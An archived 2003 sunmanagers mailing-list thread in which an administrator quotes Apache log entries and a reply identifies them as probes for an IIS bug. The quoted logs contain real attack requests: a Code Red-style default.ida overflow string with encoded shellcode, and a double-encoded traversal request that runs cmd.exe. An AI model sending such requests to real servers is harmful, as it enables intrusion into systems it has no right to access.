Attempted hacking???

From: Hobbs, Richard (hobbs@mongeese.co.uk)
Date: Wed Apr 16 2003 - 12:13:58 EDT

• Next message: Dave Martini: "SUMMARY: How to tell if machine is 64bit or 32bit?"
• Previous message: Rick Y: "*****SPAM***** question with remote connection"
• In reply to: Mike's List: "Attempted hacking???"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hello,

This is a well known bug in Micro$not IIS... check out my page:

  http://broadband.mongeese.co.uk/server-status

You will probably see a few requests for this on there too. It's a bug with IIS,
and someone somewhere is hitting your web server in the hope that it's IIS. If
it was, they would gain some kind of access to your system.

Hope this helps!!

Hobbs.
http://unixforum.co.uk

Quoting Mike's List <mikelist@sky.net>:

> My access log for apache is full of the three lines below, is someone
> attempting to hack my web server thinking it's a Windows machine???
> Solaris running Apache...
>
> x.x.x.x - - [13/Apr/2003:21:14:23 -0500] "GET
>
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 164
>
> x.x.x.x - - [13/Apr/2003:22:38:34 -0500] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
>
> x.x.x.x - - [13/Apr/2003:22:39:24 -0500] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
>
> Thanks.
>
>
> - Mike
>
> [ In addition to www.sunfreeware.com more packages at ftp.patriots.net ]
>
> -----
>
> "They that can give up essential liberty to obtain a little
> temporary safety deserve neither liberty nor safety."
>
> -- Benjamin Franklin,
> Historical Review of Pennsylvania.
> _______________________________________________
> sunmanagers mailing list
> sunmanagers@sunmanagers.org
> http://www.sunmanagers.org/mailman/listinfo/sunmanagers
>

-- 
Richard Hobbs
hobbs@mongeese.co.uk
http://mongeese.co.uk | http://unixforum.co.uk
"There's only one way of life, and that's your own" - The Levellers
_____________________________________________________
Send all your jokes to jokes@fishsponge.co.uk !!
To subscribe, email: jokes-subscribe@fishsponge.co.uk
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers

• Next message: Dave Martini: "SUMMARY: How to tell if machine is 64bit or 32bit?"
• Previous message: Rick Y: "*****SPAM***** question with remote connection"
• In reply to: Mike's List: "Attempted hacking???"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 23:26:12 EDT